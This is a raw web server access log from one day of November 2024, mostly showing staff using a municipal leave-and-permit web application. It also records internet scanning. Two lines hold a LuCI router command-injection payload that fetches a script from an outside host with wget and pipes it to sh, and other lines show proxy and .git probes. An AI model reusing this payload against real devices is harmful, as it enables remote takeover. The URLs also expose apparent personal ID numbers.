154.213.184.18 - - [27/Nov/2024:00:41:11 -0300] "CONNECT example.com:443 HTTP/1.1" 400 -
20.118.69.87 - - [27/Nov/2024:00:44:21 -0300] "GET /hudson HTTP/1.1" 404 973
167.94.146.51 - - [27/Nov/2024:01:21:52 -0300] "GET / HTTP/1.1" 200 11217
167.94.146.51 - - [27/Nov/2024:01:21:56 -0300] "GET / HTTP/1.1" 200 11217
167.94.146.51 - - [27/Nov/2024:01:21:57 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
167.94.146.51 - - [27/Nov/2024:01:21:58 -0300] "PRI * HTTP/2.0" 505 -
37.44.238.92 - - [27/Nov/2024:01:27:15 -0300] "CONNECT google.com:443 HTTP/1.1" 400 -
114.34.157.91 - - [27/Nov/2024:01:31:24 -0300] "GET / HTTP/1.0" 200 11197
185.91.127.77 - - [27/Nov/2024:02:07:16 -0300] "CONNECT toffy.lol:443 HTTP/1.1" 400 -
185.91.127.77 - - [27/Nov/2024:02:41:20 -0300] "CONNECT toffy.lol:443 HTTP/1.1" 400 -
58.220.109.154 - - [27/Nov/2024:02:59:26 -0300] "GET / HTTP/1.1" 200 11217
87.120.115.142 - - [27/Nov/2024:03:40:33 -0300] "HEAD / HTTP/1.0" 200 -
87.120.115.142 - - [27/Nov/2024:03:40:35 -0300] "GET /.git/config HTTP/1.1" 404 983
185.224.128.67 - - [27/Nov/2024:03:51:52 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.215%2Ft%7Csh%3B%60) HTTP/1.1" 404 1013
185.224.128.67 - - [27/Nov/2024:03:51:52 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.215%2Ft%7Csh%3B%60) HTTP/1.1" 404 1013
154.213.184.18 - - [27/Nov/2024:04:39:26 -0300] "CONNECT example.com:443 HTTP/1.1" 400 -
185.91.127.77 - - [27/Nov/2024:05:59:46 -0300] "CONNECT toffy.lol:443 HTTP/1.1" 400 -
185.91.127.77 - - [27/Nov/2024:06:17:10 -0300] "CONNECT toffy.lol:443 HTTP/1.1" 400 -
190.163.3.52 - - [27/Nov/2024:06:20:32 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 7591
190.163.3.52 - - [27/Nov/2024:06:20:34 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1793
190.95.15.15 - - [27/Nov/2024:06:48:16 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1716
190.95.15.15 - - [27/Nov/2024:06:48:30 -0300] "POST /cormun/servlet/hlogin?af2aa958944d75e9fd692895176f8cb2,gx-no-cache=1732700914215 HTTP/1.1" 200 90
190.95.15.15 - - [27/Nov/2024:06:48:30 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 947
190.95.15.15 - - [27/Nov/2024:06:48:30 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3969
190.95.15.15 - - [27/Nov/2024:06:48:35 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13263
190.171.152.138 - - [27/Nov/2024:07:02:32 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1722
190.171.152.138 - - [27/Nov/2024:07:03:02 -0300] "POST /cormun/servlet/hlogin?0223ef494b9ef8d65eb8fe0aebe78ac7,gx-no-cache=1732701788188 HTTP/1.1" 200 90
190.171.152.138 - - [27/Nov/2024:07:03:02 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.171.152.138 - - [27/Nov/2024:07:03:02 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3872
190.171.152.138 - - [27/Nov/2024:07:03:31 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 12974
190.171.152.138 - - [27/Nov/2024:07:03:47 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 11518
190.171.152.138 - - [27/Nov/2024:07:05:03 -0300] "GET /cormun/servlet/alicenciaprn?16493213,L,20241126000000,PU HTTP/1.1" 200 1544
190.171.152.138 - - [27/Nov/2024:07:06:56 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 12971
190.171.152.138 - - [27/Nov/2024:07:07:13 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1740
181.212.40.185 - - [27/Nov/2024:07:16:25 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 7551
181.212.40.185 - - [27/Nov/2024:07:16:26 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1735
181.212.40.185 - - [27/Nov/2024:07:16:26 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 7550
181.212.40.185 - - [27/Nov/2024:07:16:57 -0300] "POST /cormun/servlet/hlogin?8270e2547a335d707657ddcc821c4ef0,gx-no-cache=1732702624010 HTTP/1.1" 200 90
181.212.40.185 - - [27/Nov/2024:07:16:57 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 953
181.212.40.185 - - [27/Nov/2024:07:16:57 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 19350
122.117.58.111 - - [27/Nov/2024:07:19:18 -0300] "GET / HTTP/1.0" 200 11197
185.91.127.77 - - [27/Nov/2024:07:27:36 -0300] "CONNECT toffy.lol:443 HTTP/1.1" 400 -
190.171.153.26 - - [27/Nov/2024:07:34:24 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1723
190.171.153.26 - - [27/Nov/2024:07:34:31 -0300] "POST /cormun/servlet/hlogin?6072547915a8e54383d1e54b1e6058db,gx-no-cache=1732707224671 HTTP/1.1" 200 90
190.171.153.26 - - [27/Nov/2024:07:34:31 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 953
190.171.153.26 - - [27/Nov/2024:07:34:31 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3974
190.171.153.26 - - [27/Nov/2024:07:34:35 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 10198
190.171.153.26 - - [27/Nov/2024:07:34:38 -0300] "POST /cormun/servlet/trlicencias?6072547915a8e54383d1e54b1e6058db,,gx-no-cache=1732707231448 HTTP/1.1" 200 7737
190.171.152.242 - - [27/Nov/2024:07:42:04 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1723
190.171.152.242 - - [27/Nov/2024:07:42:04 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1734
190.171.152.242 - - [27/Nov/2024:07:42:04 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
190.171.152.242 - - [27/Nov/2024:07:42:11 -0300] "POST /cormun/servlet/hlogin?e32013dd8daa57c5d722e0479e8f8419,gx-no-cache=1732704137723 HTTP/1.1" 200 90
190.171.152.242 - - [27/Nov/2024:07:42:11 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 952
190.171.152.242 - - [27/Nov/2024:07:42:11 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3995
190.171.152.242 - - [27/Nov/2024:07:42:20 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 11361
190.171.152.242 - - [27/Nov/2024:07:51:20 -0300] "GET /cormun/servlet/trlicenciaspermisoslog?14011145,L,20241120000000, HTTP/1.1" 200 6224
190.171.152.242 - - [27/Nov/2024:07:51:20 -0300] "GET /cormun/static/gxui/gxui-all.css?110300 HTTP/1.1" 200 2179
190.171.152.242 - - [27/Nov/2024:07:51:20 -0300] "GET /cormun/static/calendar-system.css?75620 HTTP/1.1" 200 5572
190.171.152.242 - - [27/Nov/2024:07:51:20 -0300] "GET /cormun/static/gxcfg.js?201991422452353 HTTP/1.1" 200 953
190.171.152.242 - - [27/Nov/2024:07:51:20 -0300] "GET /cormun/static/trlicenciaspermisoslog.js?201991422452676 HTTP/1.1" 200 20074
190.171.152.242 - - [27/Nov/2024:07:51:20 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?2294816 HTTP/1.1" 200 100853
190.171.152.242 - - [27/Nov/2024:07:51:20 -0300] "GET /cormun/static/Shared/ext/resources/css/ext-all.css?205870 HTTP/1.1" 200 416045
190.171.142.26 - - [27/Nov/2024:07:51:24 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1723
190.171.142.26 - - [27/Nov/2024:07:51:25 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
190.171.142.26 - - [27/Nov/2024:07:51:27 -0300] "POST /cormun/servlet/hlogin?8cd51a4c428f83fcbc9187afb832b3c4,gx-no-cache=1732704694153 HTTP/1.1" 200 90
190.171.142.26 - - [27/Nov/2024:07:51:27 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 950
190.171.142.26 - - [27/Nov/2024:07:51:27 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4296
190.171.142.26 - - [27/Nov/2024:07:52:50 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1723
190.171.142.26 - - [27/Nov/2024:07:52:53 -0300] "POST /cormun/servlet/hlogin?8cd51a4c428f83fcbc9187afb832b3c4,gx-no-cache=1732704779422 HTTP/1.1" 200 90
190.171.142.26 - - [27/Nov/2024:07:52:53 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 950
190.171.142.26 - - [27/Nov/2024:07:52:53 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4296
190.171.141.106 - - [27/Nov/2024:07:56:15 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1718
190.171.141.106 - - [27/Nov/2024:07:56:15 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1729
190.171.141.106 - - [27/Nov/2024:07:56:15 -0300] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 1025
190.171.141.106 - - [27/Nov/2024:07:56:15 -0300] "GET /apple-touch-icon.png HTTP/1.1" 404 1001
190.171.141.106 - - [27/Nov/2024:07:56:15 -0300] "GET /apple-touch-icon-precomposed.png HTTP/1.1" 404 1025
190.171.141.106 - - [27/Nov/2024:07:56:15 -0300] "GET /apple-touch-icon.png HTTP/1.1" 404 1001
181.212.43.89 - - [27/Nov/2024:07:56:29 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1718
190.171.141.106 - - [27/Nov/2024:07:56:30 -0300] "POST /cormun/servlet/hlogin?46169f3442e2436a5e5f060a291c7668,gx-no-cache=1732704997063 HTTP/1.1" 200 90
190.171.141.106 - - [27/Nov/2024:07:56:30 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 949
190.171.141.106 - - [27/Nov/2024:07:56:30 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4198
190.171.141.106 - - [27/Nov/2024:07:56:33 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15070
190.171.141.106 - - [27/Nov/2024:07:57:05 -0300] "GET /cormun/servlet/licenciaspermisos?DSP,8980270,L,20241126000000, HTTP/1.1" 200 7350
190.171.141.106 - - [27/Nov/2024:07:57:53 -0300] "GET /cormun/servlet/licenciaspermisos?DSP,19379474,L,20241126000000, HTTP/1.1" 200 7291
190.171.141.106 - - [27/Nov/2024:07:58:20 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.141.106 - - [27/Nov/2024:07:58:29 -0300] "POST /cormun/servlet/trlicencias?46169f3442e2436a5e5f060a291c7668,,gx-no-cache=1732705115413 HTTP/1.1" 200 18414
190.171.141.106 - - [27/Nov/2024:07:58:29 -0300] "GET /cormun/static/Resources/PXToolsGridNext.gif HTTP/1.1" 200 369
190.171.141.106 - - [27/Nov/2024:07:58:29 -0300] "GET /cormun/static/Resources/PXToolsGridLast.gif HTTP/1.1" 200 370
190.171.141.106 - - [27/Nov/2024:07:58:40 -0300] "POST /cormun/servlet/trlicencias?46169f3442e2436a5e5f060a291c7668,,gx-no-cache=1732705126152 HTTP/1.1" 200 101
190.171.141.106 - - [27/Nov/2024:07:58:40 -0300] "GET /cormun/Licencias-2726.xls HTTP/1.1" 200 39424
190.171.142.26 - - [27/Nov/2024:08:00:09 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1723
190.171.142.26 - - [27/Nov/2024:08:00:12 -0300] "POST /cormun/servlet/hlogin?8cd51a4c428f83fcbc9187afb832b3c4,gx-no-cache=1732705218446 HTTP/1.1" 200 90
190.171.142.26 - - [27/Nov/2024:08:00:12 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 950
190.171.142.26 - - [27/Nov/2024:08:00:12 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4296
190.171.142.26 - - [27/Nov/2024:08:00:17 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 14830
190.171.143.82 - - [27/Nov/2024:08:03:56 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3316
190.171.143.82 - - [27/Nov/2024:08:03:58 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1728
190.171.143.82 - - [27/Nov/2024:08:04:02 -0300] "POST /cormun/servlet/hlogin?a41cd54486caec0233075b0799c5577e,gx-no-cache=1732705449223 HTTP/1.1" 200 90
190.171.143.82 - - [27/Nov/2024:08:04:02 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 946
190.171.143.82 - - [27/Nov/2024:08:04:03 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4285
190.171.143.82 - - [27/Nov/2024:08:04:19 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 15612
190.171.143.82 - - [27/Nov/2024:08:04:44 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 11428
200.54.103.162 - - [27/Nov/2024:08:07:57 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3320
200.54.103.162 - - [27/Nov/2024:08:07:57 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1729
200.54.103.162 - - [27/Nov/2024:08:07:59 -0300] "POST /cormun/servlet/hlogin?29fee370ff751c47c04ee14c02f5b720,gx-no-cache=1732705690777 HTTP/1.1" 200 90
200.54.103.162 - - [27/Nov/2024:08:07:59 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 949
200.54.103.162 - - [27/Nov/2024:08:08:00 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4340
200.54.103.162 - - [27/Nov/2024:08:08:02 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13084
200.54.103.162 - - [27/Nov/2024:08:08:06 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1733
190.171.142.26 - - [27/Nov/2024:08:11:18 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1716
190.171.142.26 - - [27/Nov/2024:08:11:24 -0300] "POST /cormun/servlet/hlogin?038be0629ff64dd900ceee96837e73ee,gx-no-cache=1732705890717 HTTP/1.1" 200 90
190.171.142.26 - - [27/Nov/2024:08:11:24 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 948
190.171.142.26 - - [27/Nov/2024:08:11:24 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4286
181.212.43.89 - - [27/Nov/2024:08:13:29 -0300] "POST /cormun/servlet/hlogin?b8493e1a7480905175ddf67f4d5f444f,gx-no-cache=1732706015712 HTTP/1.1" 200 90
181.212.43.89 - - [27/Nov/2024:08:13:29 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 950
181.212.43.89 - - [27/Nov/2024:08:13:29 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4019
181.212.43.89 - - [27/Nov/2024:08:13:32 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 19509
190.95.15.15 - - [27/Nov/2024:08:14:02 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1717
190.95.15.15 - - [27/Nov/2024:08:14:18 -0300] "POST /cormun/servlet/hlogin?402a1482c1865e31e55a15665f6e3ff0,gx-no-cache=1732706064830 HTTP/1.1" 200 90
190.95.15.15 - - [27/Nov/2024:08:14:18 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 948
190.95.15.15 - - [27/Nov/2024:08:14:18 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3971
190.95.15.15 - - [27/Nov/2024:08:14:21 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13264
190.171.141.106 - - [27/Nov/2024:08:14:46 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3329
190.171.141.106 - - [27/Nov/2024:08:14:47 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1739
190.171.141.106 - - [27/Nov/2024:08:14:53 -0300] "POST /cormun/servlet/hlogin?b036f4f4e0d021a46f440afd939fe5d9,gx-no-cache=1732706100075 HTTP/1.1" 200 90
190.171.141.106 - - [27/Nov/2024:08:14:53 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 955
190.171.141.106 - - [27/Nov/2024:08:14:53 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4211
190.171.141.106 - - [27/Nov/2024:08:15:01 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15080
190.171.152.114 - - [27/Nov/2024:08:15:45 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1727
190.171.152.114 - - [27/Nov/2024:08:15:45 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1738
190.171.152.114 - - [27/Nov/2024:08:16:02 -0300] "POST /cormun/servlet/hlogin?37321627d312c6b451cd2019f62be9e5,gx-no-cache=1732706168492 HTTP/1.1" 200 90
190.171.152.114 - - [27/Nov/2024:08:16:02 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 955
190.171.152.114 - - [27/Nov/2024:08:16:02 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4332
190.171.152.114 - - [27/Nov/2024:08:16:06 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15979
190.171.152.114 - - [27/Nov/2024:08:16:14 -0300] "GET /cormun/servlet/alicenciaprn?15219330,L,20241126000000,PU HTTP/1.1" 200 1558
190.171.152.114 - - [27/Nov/2024:08:16:25 -0300] "GET /cormun/servlet/alicenciaprn?17520495,L,20241124000000,PU HTTP/1.1" 200 1543
190.171.152.114 - - [27/Nov/2024:08:16:36 -0300] "GET /cormun/servlet/alicenciaprn?17212068,L,20241123000000,PU HTTP/1.1" 200 1556
190.171.152.114 - - [27/Nov/2024:08:16:47 -0300] "GET /cormun/servlet/alicenciaprn?12367353,L,20241123000000,PU HTTP/1.1" 200 1563
190.171.142.26 - - [27/Nov/2024:08:18:03 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 14821
190.171.149.74 - - [27/Nov/2024:08:21:12 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 6020
190.171.149.74 - - [27/Nov/2024:08:21:13 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1740
190.171.149.74 - - [27/Nov/2024:08:21:13 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 6029
190.171.149.74 - - [27/Nov/2024:08:21:18 -0300] "POST /cormun/servlet/hlogin?4ce7b43d4984de88defbd3020832d4b5,gx-no-cache=1732706483168 HTTP/1.1" 200 90
190.171.149.74 - - [27/Nov/2024:08:21:18 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 956
190.171.149.74 - - [27/Nov/2024:08:21:18 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15369
190.171.149.74 - - [27/Nov/2024:08:21:21 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15596
190.171.141.138 - - [27/Nov/2024:08:21:36 -0300] "GET /cormun/servlet/trautorizarpermisogoce? HTTP/1.1" 200 5934
190.171.141.138 - - [27/Nov/2024:08:21:37 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1736
200.54.103.162 - - [27/Nov/2024:08:35:58 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3320
200.54.103.162 - - [27/Nov/2024:08:35:58 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1729
200.54.103.162 - - [27/Nov/2024:08:36:01 -0300] "POST /cormun/servlet/hlogin?29fee370ff751c47c04ee14c02f5b720,gx-no-cache=1732707372227 HTTP/1.1" 200 90
200.54.103.162 - - [27/Nov/2024:08:36:01 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 949
200.54.103.162 - - [27/Nov/2024:08:36:01 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4340
200.54.103.162 - - [27/Nov/2024:08:36:03 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13084
194.50.16.198 - - [27/Nov/2024:08:36:29 -0300] "GET / HTTP/1.1" 200 11217
190.171.141.138 - - [27/Nov/2024:08:36:32 -0300] "POST /cormun/servlet/hlogin?979b7f2a4c5a716eecb10cc4f90f3bb7,gx-no-cache=1732707398814 HTTP/1.1" 200 90
190.171.141.138 - - [27/Nov/2024:08:36:32 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 954
190.171.141.138 - - [27/Nov/2024:08:36:32 -0300] "GET /cormun/servlet/trautorizarpermisogoce HTTP/1.1" 200 7140
190.171.141.138 - - [27/Nov/2024:08:36:35 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13819
190.171.141.138 - - [27/Nov/2024:08:42:32 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13819
190.171.141.138 - - [27/Nov/2024:08:42:32 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13817
10.40.40.2 - - [27/Nov/2024:08:51:17 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1723
10.40.40.2 - - [27/Nov/2024:08:51:19 -0300] "POST /cormun/servlet/hlogin?7d417db6cec6d561ac7efe98fdb9bfe2,gx-no-cache=1732708379796 HTTP/1.1" 200 90
10.40.40.2 - - [27/Nov/2024:08:51:20 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 952
10.40.40.2 - - [27/Nov/2024:08:51:20 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3821
10.40.40.2 - - [27/Nov/2024:08:51:23 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 8308
190.171.141.114 - - [27/Nov/2024:08:53:42 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1719
190.171.141.114 - - [27/Nov/2024:08:53:42 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1730
190.171.141.114 - - [27/Nov/2024:08:53:47 -0300] "POST /cormun/servlet/hlogin?963c40b3a82175972dccf021d18e3e92,gx-no-cache=1732708432405 HTTP/1.1" 200 90
190.171.141.114 - - [27/Nov/2024:08:53:47 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 949
190.171.141.114 - - [27/Nov/2024:08:53:47 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4006
190.171.141.114 - - [27/Nov/2024:08:53:54 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 15222
190.171.141.114 - - [27/Nov/2024:08:53:57 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6872
190.171.141.114 - - [27/Nov/2024:08:54:48 -0300] "GET /cormun/servlet/permisogoce?ff7c72fddaaeb5e92d165bad27b85a2f54f942634a20d53d9036027b62fa6879d8568abcde7d530acde50aa53eef534458f22c22461b0fa9f529e4447db7050d,gx-no-cache=1732708493294 HTTP/1.1" 200 81
190.171.141.114 - - [27/Nov/2024:08:54:48 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.141.114 - - [27/Nov/2024:08:54:59 -0300] "GET /cormun/servlet/permisogoce?ff7c72fddaaeb5e92d165bad27b85a2f1b5dfd212a3e4ddb41676884e7e78eaa3c7eb60650ce6d5dba2c70059eb4c27baacfcea408afc82c8137c35ff3eb7392,gx-no-cache=1732708505293 HTTP/1.1" 200 46
190.171.141.114 - - [27/Nov/2024:08:55:20 -0300] "POST /cormun/servlet/permisogoce?963c40b3a82175972dccf021d18e3e92,INS,0,,,,gx-no-cache=1732708514214 HTTP/1.1" 200 93
190.171.141.114 - - [27/Nov/2024:08:55:20 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1008
190.171.141.114 - - [27/Nov/2024:08:55:20 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15443
200.54.103.162 - - [27/Nov/2024:08:55:34 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4328
200.54.103.162 - - [27/Nov/2024:08:55:36 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 13084
190.171.141.114 - - [27/Nov/2024:08:55:58 -0300] "GET /cormun/servlet/apermisogoceprn?10343084,P,20241127085353,PU HTTP/1.1" 200 1657
154.216.17.93 - - [27/Nov/2024:08:56:03 -0300] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 -
190.171.152.114 - - [27/Nov/2024:08:57:09 -0300] "GET /cormun/servlet/alicenciaprn?9021206,L,20241121000000,PU HTTP/1.1" 200 1569
190.171.152.114 - - [27/Nov/2024:08:57:26 -0300] "GET /cormun/servlet/alicenciaprn?13964132,L,20241112000000,PU HTTP/1.1" 200 1560
154.213.184.18 - - [27/Nov/2024:09:00:44 -0300] "CONNECT example.com:443 HTTP/1.1" 400 -
190.171.152.114 - - [27/Nov/2024:09:00:51 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 6035
10.40.40.2 - - [27/Nov/2024:09:00:51 -0300] "POST /cormun/servlet/trsolicitudgral?7d417db6cec6d561ac7efe98fdb9bfe2,,gx-no-cache=1732708629671 HTTP/1.1" 200 5243
190.171.152.114 - - [27/Nov/2024:09:00:51 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1740
190.171.152.114 - - [27/Nov/2024:09:01:05 -0300] "POST /cormun/servlet/hlogin?43b33b5b6348d58fe7d6b40368ca6727,gx-no-cache=1732708872203 HTTP/1.1" 200 90
190.171.152.114 - - [27/Nov/2024:09:01:05 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 958
190.171.152.114 - - [27/Nov/2024:09:01:06 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15028
190.171.152.114 - - [27/Nov/2024:09:01:12 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7226
190.171.152.114 - - [27/Nov/2024:09:01:45 -0300] "GET /cormun/servlet/permisogoce?4b8595c31c51d86f7a85a4ca64e1f78041bb324dcc6b6fdb53b91fdf1d9ba331618e86d476d29d9133a336d964ff141fb4f85942c269bbb19849250cee489f4c,gx-no-cache=1732708911404 HTTP/1.1" 200 80
190.171.152.114 - - [27/Nov/2024:09:01:48 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.152.114 - - [27/Nov/2024:09:02:01 -0300] "GET /cormun/servlet/permisogoce?4b8595c31c51d86f7a85a4ca64e1f780006c2bd1e0a5fc4757c63404faf8a2af11afe2a2168c0f2255e075ea81a40292624b3d073c75c8bd2f4ae65219861cf6,gx-no-cache=1732708928089 HTTP/1.1" 200 47
190.171.152.114 - - [27/Nov/2024:09:02:48 -0300] "POST /cormun/servlet/permisogoce?43b33b5b6348d58fe7d6b40368ca6727,INS,0,,,,gx-no-cache=1732708930236 HTTP/1.1" 200 93
190.171.152.114 - - [27/Nov/2024:09:02:48 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1011
190.171.152.114 - - [27/Nov/2024:09:02:48 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15256
181.212.40.185 - - [27/Nov/2024:09:02:58 -0300] "GET /cormun/servlet/licenciaspermisos?INS,0,,, HTTP/1.1" 200 6783
181.212.40.185 - - [27/Nov/2024:09:02:58 -0300] "GET /cormun/static/gxcfg.js?202012153173 HTTP/1.1" 200 953
181.212.40.185 - - [27/Nov/2024:09:02:58 -0300] "GET /cormun/static/licenciaspermisos.js?2020121532136 HTTP/1.1" 200 38753
181.212.40.185 - - [27/Nov/2024:09:02:58 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1748
190.171.144.234 - - [27/Nov/2024:09:03:03 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1728
181.212.40.185 - - [27/Nov/2024:09:03:08 -0300] "POST /cormun/servlet/hlogin?971de4bd52d6306e81962b97a4d5dae5,gx-no-cache=1732708995341 HTTP/1.1" 200 90
181.212.40.185 - - [27/Nov/2024:09:03:08 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 967
181.212.40.185 - - [27/Nov/2024:09:03:08 -0300] "GET /cormun/servlet/licenciaspermisos?INS,0,,, HTTP/1.1" 200 7675
190.171.144.234 - - [27/Nov/2024:09:03:10 -0300] "POST /cormun/servlet/hlogin?f69f6ee7b7f4ae34f6711faeb4459d8e,gx-no-cache=1732708996743 HTTP/1.1" 200 90
190.171.144.234 - - [27/Nov/2024:09:03:10 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 957
190.171.144.234 - - [27/Nov/2024:09:03:11 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4004
190.171.152.114 - - [27/Nov/2024:09:03:14 -0300] "GET /cormun/servlet/apermisogoceprn?13502963,P,20241127090109,PU HTTP/1.1" 200 1664
190.171.144.234 - - [27/Nov/2024:09:03:16 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 14221
181.212.40.185 - - [27/Nov/2024:09:03:21 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 19459
